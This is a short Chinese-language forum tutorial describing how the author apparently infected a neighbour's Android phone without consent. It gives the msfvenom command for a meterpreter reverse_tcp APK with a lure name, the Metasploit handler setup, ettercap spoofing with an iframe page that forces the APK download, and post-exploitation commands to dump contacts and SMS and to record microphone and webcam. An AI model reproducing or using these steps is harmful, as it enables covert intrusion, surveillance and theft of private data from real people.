首先启动msf
先用kali生成一个安卓木马,如下命令:
[AppleScript] 纯文本查看 复制代码
1
|
Msfvenom - p android / meterpreter / reverse_tcp LHOST = 192.1 68.0 . 109 LPORT = 44444 - o ~ / Desktop / ribenav.apk |
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入Msf
[AppleScript] 纯文本查看 复制代码
1
2
3
4
5
|
use exploit / multi / handler set payload android / meterpreter / reverse_tcp set LHOST 192.1 68.0 . 109 / / ip为kaili的ip set LPORT 44444 / / 端口一定要与前面生成的木马的端口一致 Exploit |
下面我们开启ettercap -G
我物理IP为
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
下面我们开始攻击
大概过了5分钟多,发现反弹成功了
执行命令
[AppleScript] 纯文本查看 复制代码
1
2
3
4
5
6
7
|
dump_contacts --》这个是导出电话 dump_sms --》这个是导出信息 record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam |
我们打开看一下电话薄
我们同时欺骗成DroidJack木马,使用方法如图:
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口